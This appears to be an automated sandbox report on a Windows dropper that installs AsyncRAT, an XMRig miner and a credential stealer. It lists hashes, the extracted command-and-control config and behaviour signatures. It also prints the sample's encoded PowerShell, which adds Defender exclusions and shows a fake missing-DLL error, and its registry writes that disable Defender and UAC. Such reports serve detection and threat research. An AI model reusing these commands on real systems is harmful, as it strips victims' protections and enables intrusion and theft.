Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2024 14:53
Static task
static1
Behavioral task
behavioral1
Sample
munchenclient.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
munchenclient.exe
Resource
win10v2004-20241007-en
General
-
Target
munchenclient.exe
-
Size
6.3MB
-
MD5
b995bac46098f434d11d84ec79bcb6ac
-
SHA1
3bb75ae3a8ec4054ccbeea3e3b2daf854bad81e2
-
SHA256
0a7f831cb637214cae61b0e833bd5e5fabadd5dc5d4d68331fe76cce091e1542
-
SHA512
72a515bfb170f0c06a26b3907cf31802a1ebb3b148d0f3a60d4424ea899f5f1b38d9a4bfd5fe25960d65eda8623e9ac12f1069d2940b1ad7e234c8bf78da54ce
-
SSDEEP
196608:kpPx7IW+Ryxgp1qRAL1vJYrET+9b6P32gm/uMkOPx5WzN:k9x5gp1qSL1vJYrM8b+3NkOOPxy
Malware Config
Extracted
asyncrat
1.0.7
Gibsons
198.98.58.93:999
obamanet_floyd999
-
delay
1
-
install
true
-
install_file
Core Sound Service.exe
-
install_folder
%AppData%
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/2828-416-0x0000000001890000-0x000000000189E000-memory.dmp disable_win_def -
Processes:
Core Sound Service.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Core Sound Service.exe -
Processes:
Core Sound Service.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" Core Sound Service.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe family_asyncrat -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/4104-508-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-510-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-513-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-515-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-514-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-512-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-516-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-517-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-519-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-520-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4104-524-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4336 powershell.exe 640 powershell.exe 4572 powershell.exe 948 powershell.exe 4184 powershell.exe 2832 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
munchenclient.exemunchenclients.exeCore Sound Service.exeCore Sound Service.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation munchenclient.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation munchenclients.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Core Sound Service.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Core Sound Service.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 10 IoCs
Processes:
munchenclients.exeCore Sound Service.exeBuilt.exeBuilt.exeCore Sound Service.exerar.exesplwow64.exeCore Sound Service.exeservices64.exesihost64.exepid process 3564 munchenclients.exe 1280 Core Sound Service.exe 4636 Built.exe 2384 Built.exe 2828 Core Sound Service.exe 1488 rar.exe 3560 splwow64.exe 4920 Core Sound Service.exe 3468 services64.exe 4208 sihost64.exe -
Loads dropped DLL 16 IoCs
Processes:
Built.exepid process 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe 2384 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Processes:
Core Sound Service.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" Core Sound Service.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Processes:
Core Sound Service.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" Core Sound Service.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 4356 tasklist.exe 1472 tasklist.exe 4424 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 4904 set thread context of 4104 4904 conhost.exe explorer.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI46362\python310.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_ssl.pyd upx behavioral2/memory/2384-105-0x00007FFB62330000-0x00007FFB62354000-memory.dmp upx behavioral2/memory/2384-106-0x00007FFB655E0000-0x00007FFB655EF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46362\_ctypes.pyd upx behavioral2/memory/2384-83-0x00007FFB4F740000-0x00007FFB4FBAE000-memory.dmp upx behavioral2/memory/2384-118-0x00007FFB4F5C0000-0x00007FFB4F731000-memory.dmp upx behavioral2/memory/2384-117-0x00007FFB62310000-0x00007FFB6232F000-memory.dmp upx behavioral2/memory/2384-114-0x00007FFB65530000-0x00007FFB65549000-memory.dmp upx behavioral2/memory/2384-113-0x00007FFB61C80000-0x00007FFB61CAD000-memory.dmp upx behavioral2/memory/2384-146-0x00007FFB4F240000-0x00007FFB4F5B5000-memory.dmp upx behavioral2/memory/2384-147-0x00007FFB4F180000-0x00007FFB4F238000-memory.dmp upx behavioral2/memory/2384-154-0x00007FFB4F060000-0x00007FFB4F178000-memory.dmp upx behavioral2/memory/2384-153-0x00007FFB623B0000-0x00007FFB623BD000-memory.dmp upx behavioral2/memory/2384-152-0x00007FFB61520000-0x00007FFB61534000-memory.dmp upx behavioral2/memory/2384-151-0x00007FFB62330000-0x00007FFB62354000-memory.dmp upx behavioral2/memory/2384-145-0x00007FFB4F740000-0x00007FFB4FBAE000-memory.dmp upx behavioral2/memory/2384-133-0x00007FFB5E080000-0x00007FFB5E0AE000-memory.dmp upx behavioral2/memory/2384-132-0x00007FFB65470000-0x00007FFB6547D000-memory.dmp upx behavioral2/memory/2384-131-0x00007FFB61C60000-0x00007FFB61C79000-memory.dmp upx behavioral2/memory/2384-201-0x00007FFB62310000-0x00007FFB6232F000-memory.dmp upx behavioral2/memory/2384-202-0x00007FFB4F5C0000-0x00007FFB4F731000-memory.dmp upx behavioral2/memory/2384-275-0x00007FFB5E080000-0x00007FFB5E0AE000-memory.dmp upx behavioral2/memory/2384-274-0x00007FFB61C60000-0x00007FFB61C79000-memory.dmp upx behavioral2/memory/2384-356-0x00007FFB4F180000-0x00007FFB4F238000-memory.dmp upx behavioral2/memory/2384-355-0x00007FFB4F240000-0x00007FFB4F5B5000-memory.dmp upx behavioral2/memory/2384-383-0x00007FFB62310000-0x00007FFB6232F000-memory.dmp upx behavioral2/memory/2384-379-0x00007FFB62330000-0x00007FFB62354000-memory.dmp upx behavioral2/memory/2384-384-0x00007FFB4F5C0000-0x00007FFB4F731000-memory.dmp upx behavioral2/memory/2384-378-0x00007FFB4F740000-0x00007FFB4FBAE000-memory.dmp upx behavioral2/memory/2384-418-0x00007FFB4F740000-0x00007FFB4FBAE000-memory.dmp upx behavioral2/memory/2384-444-0x00007FFB4F180000-0x00007FFB4F238000-memory.dmp upx behavioral2/memory/2384-449-0x00007FFB655E0000-0x00007FFB655EF000-memory.dmp upx behavioral2/memory/2384-457-0x00007FFB5E080000-0x00007FFB5E0AE000-memory.dmp upx behavioral2/memory/2384-458-0x00007FFB4F240000-0x00007FFB4F5B5000-memory.dmp upx behavioral2/memory/2384-456-0x00007FFB65470000-0x00007FFB6547D000-memory.dmp upx behavioral2/memory/2384-455-0x00007FFB4F5C0000-0x00007FFB4F731000-memory.dmp upx behavioral2/memory/2384-454-0x00007FFB62310000-0x00007FFB6232F000-memory.dmp upx behavioral2/memory/2384-453-0x00007FFB65530000-0x00007FFB65549000-memory.dmp upx behavioral2/memory/2384-452-0x00007FFB61C80000-0x00007FFB61CAD000-memory.dmp upx behavioral2/memory/2384-451-0x00007FFB4F740000-0x00007FFB4FBAE000-memory.dmp upx behavioral2/memory/2384-450-0x00007FFB62330000-0x00007FFB62354000-memory.dmp upx behavioral2/memory/2384-448-0x00007FFB61C60000-0x00007FFB61C79000-memory.dmp upx behavioral2/memory/2384-447-0x00007FFB4F060000-0x00007FFB4F178000-memory.dmp upx behavioral2/memory/2384-446-0x00007FFB623B0000-0x00007FFB623BD000-memory.dmp upx behavioral2/memory/2384-445-0x00007FFB61520000-0x00007FFB61534000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exepowershell.exemunchenclient.exemunchenclients.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language munchenclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language munchenclients.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 1392 cmd.exe 4668 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2552 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2848 schtasks.exe 3740 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeCore Sound Service.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeCore Sound Service.exepowershell.execonhost.exepid process 4852 powershell.exe 2756 powershell.exe 2128 powershell.exe 3864 powershell.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 4852 powershell.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 2756 powershell.exe 2756 powershell.exe 2128 powershell.exe 2128 powershell.exe 3864 powershell.exe 3864 powershell.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 1280 Core Sound Service.exe 640 powershell.exe 640 powershell.exe 4184 powershell.exe 4184 powershell.exe 4196 powershell.exe 4196 powershell.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe 4196 powershell.exe 640 powershell.exe 4184 powershell.exe 2832 powershell.exe 2832 powershell.exe 116 powershell.exe 116 powershell.exe 116 powershell.exe 948 powershell.exe 948 powershell.exe 2088 powershell.exe 2088 powershell.exe 4940 powershell.exe 4940 powershell.exe 4572 powershell.exe 4572 powershell.exe 2828 Core Sound Service.exe 4336 powershell.exe 4336 powershell.exe 2828 Core Sound Service.exe 3828 conhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeCore Sound Service.exetasklist.exetasklist.exeWMIC.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 1280 Core Sound Service.exe Token: SeDebugPrivilege 4424 tasklist.exe Token: SeDebugPrivilege 1472 tasklist.exe Token: SeIncreaseQuotaPrivilege 996 WMIC.exe Token: SeSecurityPrivilege 996 WMIC.exe Token: SeTakeOwnershipPrivilege 996 WMIC.exe Token: SeLoadDriverPrivilege 996 WMIC.exe Token: SeSystemProfilePrivilege 996 WMIC.exe Token: SeSystemtimePrivilege 996 WMIC.exe Token: SeProfSingleProcessPrivilege 996 WMIC.exe Token: SeIncBasePriorityPrivilege 996 WMIC.exe Token: SeCreatePagefilePrivilege 996 WMIC.exe Token: SeBackupPrivilege 996 WMIC.exe Token: SeRestorePrivilege 996 WMIC.exe Token: SeShutdownPrivilege 996 WMIC.exe Token: SeDebugPrivilege 996 WMIC.exe Token: SeSystemEnvironmentPrivilege 996 WMIC.exe Token: SeRemoteShutdownPrivilege 996 WMIC.exe Token: SeUndockPrivilege 996 WMIC.exe Token: SeManageVolumePrivilege 996 WMIC.exe Token: 33 996 WMIC.exe Token: 34 996 WMIC.exe Token: 35 996 WMIC.exe Token: 36 996 WMIC.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 4356 tasklist.exe Token: SeIncreaseQuotaPrivilege 996 WMIC.exe Token: SeSecurityPrivilege 996 WMIC.exe Token: SeTakeOwnershipPrivilege 996 WMIC.exe Token: SeLoadDriverPrivilege 996 WMIC.exe Token: SeSystemProfilePrivilege 996 WMIC.exe Token: SeSystemtimePrivilege 996 WMIC.exe Token: SeProfSingleProcessPrivilege 996 WMIC.exe Token: SeIncBasePriorityPrivilege 996 WMIC.exe Token: SeCreatePagefilePrivilege 996 WMIC.exe Token: SeBackupPrivilege 996 WMIC.exe Token: SeRestorePrivilege 996 WMIC.exe Token: SeShutdownPrivilege 996 WMIC.exe Token: SeDebugPrivilege 996 WMIC.exe Token: SeSystemEnvironmentPrivilege 996 WMIC.exe Token: SeRemoteShutdownPrivilege 996 WMIC.exe Token: SeUndockPrivilege 996 WMIC.exe Token: SeManageVolumePrivilege 996 WMIC.exe Token: 33 996 WMIC.exe Token: 34 996 WMIC.exe Token: 35 996 WMIC.exe Token: 36 996 WMIC.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 116 powershell.exe Token: SeIncreaseQuotaPrivilege 4628 WMIC.exe Token: SeSecurityPrivilege 4628 WMIC.exe Token: SeTakeOwnershipPrivilege 4628 WMIC.exe Token: SeLoadDriverPrivilege 4628 WMIC.exe Token: SeSystemProfilePrivilege 4628 WMIC.exe Token: SeSystemtimePrivilege 4628 WMIC.exe Token: SeProfSingleProcessPrivilege 4628 WMIC.exe Token: SeIncBasePriorityPrivilege 4628 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
munchenclient.exemunchenclients.exeBuilt.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeCore Sound Service.exedescription pid process target process PID 864 wrote to memory of 2756 864 munchenclient.exe powershell.exe PID 864 wrote to memory of 2756 864 munchenclient.exe powershell.exe PID 864 wrote to memory of 2756 864 munchenclient.exe powershell.exe PID 864 wrote to memory of 4852 864 munchenclient.exe powershell.exe PID 864 wrote to memory of 4852 864 munchenclient.exe powershell.exe PID 864 wrote to memory of 4852 864 munchenclient.exe powershell.exe PID 864 wrote to memory of 3564 864 munchenclient.exe munchenclients.exe PID 864 wrote to memory of 3564 864 munchenclient.exe munchenclients.exe PID 864 wrote to memory of 3564 864 munchenclient.exe munchenclients.exe PID 864 wrote to memory of 1280 864 munchenclient.exe Core Sound Service.exe PID 864 wrote to memory of 1280 864 munchenclient.exe Core Sound Service.exe PID 3564 wrote to memory of 2128 3564 munchenclients.exe powershell.exe PID 3564 wrote to memory of 2128 3564 munchenclients.exe powershell.exe PID 3564 wrote to memory of 2128 3564 munchenclients.exe powershell.exe PID 3564 wrote to memory of 3864 3564 munchenclients.exe powershell.exe PID 3564 wrote to memory of 3864 3564 munchenclients.exe powershell.exe PID 3564 wrote to memory of 3864 3564 munchenclients.exe powershell.exe PID 3564 wrote to memory of 4636 3564 munchenclients.exe Built.exe PID 3564 wrote to memory of 4636 3564 munchenclients.exe Built.exe PID 4636 wrote to memory of 2384 4636 Built.exe Built.exe PID 4636 wrote to memory of 2384 4636 Built.exe Built.exe PID 2384 wrote to memory of 2064 2384 Built.exe cmd.exe PID 2384 wrote to memory of 2064 2384 Built.exe cmd.exe PID 2384 wrote to memory of 5088 2384 Built.exe cmd.exe PID 2384 wrote to memory of 5088 2384 Built.exe cmd.exe PID 2384 wrote to memory of 2624 2384 Built.exe cmd.exe PID 2384 wrote to memory of 2624 2384 Built.exe cmd.exe PID 2384 wrote to memory of 3396 2384 Built.exe cmd.exe PID 2384 wrote to memory of 3396 2384 Built.exe cmd.exe PID 2384 wrote to memory of 1476 2384 Built.exe cmd.exe PID 2384 wrote to memory of 1476 2384 Built.exe cmd.exe PID 5088 wrote to memory of 4184 5088 cmd.exe Conhost.exe PID 5088 wrote to memory of 4184 5088 cmd.exe Conhost.exe PID 3396 wrote to memory of 4424 3396 cmd.exe tasklist.exe PID 3396 wrote to memory of 4424 3396 cmd.exe tasklist.exe PID 1476 wrote to memory of 1472 1476 cmd.exe tasklist.exe PID 1476 wrote to memory of 1472 1476 cmd.exe tasklist.exe PID 2384 wrote to memory of 3692 2384 Built.exe cmd.exe PID 2384 wrote to memory of 3692 2384 Built.exe cmd.exe PID 2384 wrote to memory of 4452 2384 Built.exe cmd.exe PID 2384 wrote to memory of 4452 2384 Built.exe cmd.exe PID 2384 wrote to memory of 4516 2384 Built.exe cmd.exe PID 2384 wrote to memory of 4516 2384 Built.exe cmd.exe PID 2384 wrote to memory of 5076 2384 Built.exe cmd.exe PID 2384 wrote to memory of 5076 2384 Built.exe cmd.exe PID 2384 wrote to memory of 2796 2384 Built.exe cmd.exe PID 2384 wrote to memory of 2796 2384 Built.exe cmd.exe PID 2384 wrote to memory of 4488 2384 Built.exe cmd.exe PID 2384 wrote to memory of 4488 2384 Built.exe cmd.exe PID 2384 wrote to memory of 3468 2384 Built.exe cmd.exe PID 2384 wrote to memory of 3468 2384 Built.exe cmd.exe PID 2064 wrote to memory of 640 2064 cmd.exe powershell.exe PID 2064 wrote to memory of 640 2064 cmd.exe powershell.exe PID 2624 wrote to memory of 2412 2624 cmd.exe attrib.exe PID 2624 wrote to memory of 2412 2624 cmd.exe attrib.exe PID 3692 wrote to memory of 996 3692 cmd.exe tree.com PID 3692 wrote to memory of 996 3692 cmd.exe tree.com PID 4452 wrote to memory of 4196 4452 cmd.exe powershell.exe PID 4452 wrote to memory of 4196 4452 cmd.exe powershell.exe PID 4516 wrote to memory of 4356 4516 cmd.exe tasklist.exe PID 4516 wrote to memory of 4356 4516 cmd.exe tasklist.exe PID 2796 wrote to memory of 1364 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 1364 2796 cmd.exe netsh.exe PID 1280 wrote to memory of 644 1280 Core Sound Service.exe cmd.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Core Sound Service.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" Core Sound Service.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" Core Sound Service.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\munchenclient.exe"C:\Users\Admin\AppData\Local\Temp\munchenclient.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAcwBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABjAG8AZABlACAAZQB4AGUAYwB1AHQAaQBvAG4AIABjAGEAbgBuAG8AdAAgAHAAcgBvAGMAZQBlAGQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIAB3AGEAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAC4AIABSAGUAaQBuAHMAdABhAGwAbABpAG4AZwAgAHQAaABlACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbQBhAHkAIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AaQBxACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcwByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAaABrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdgBpACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852 -
C:\Users\Admin\AppData\Local\Temp\munchenclients.exe"C:\Users\Admin\AppData\Local\Temp\munchenclients.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAeABoACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAbQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AGSB0ACAAcwB0AGEAcgB0ACAAYgBlAGMAYQB1AHMAZQAgAE0AUwBWAEMAUAAxADQAMAAuAGQAbABsACAAaQBzACAAbQBpAHMAcwBpAG4AZwAgAGYAcgBvAG0AIAB5AG8AdQByACAAYwBvAG0AcAB1AHQAZQByAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHEAcABlACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AagBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAcAB1ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2384 -
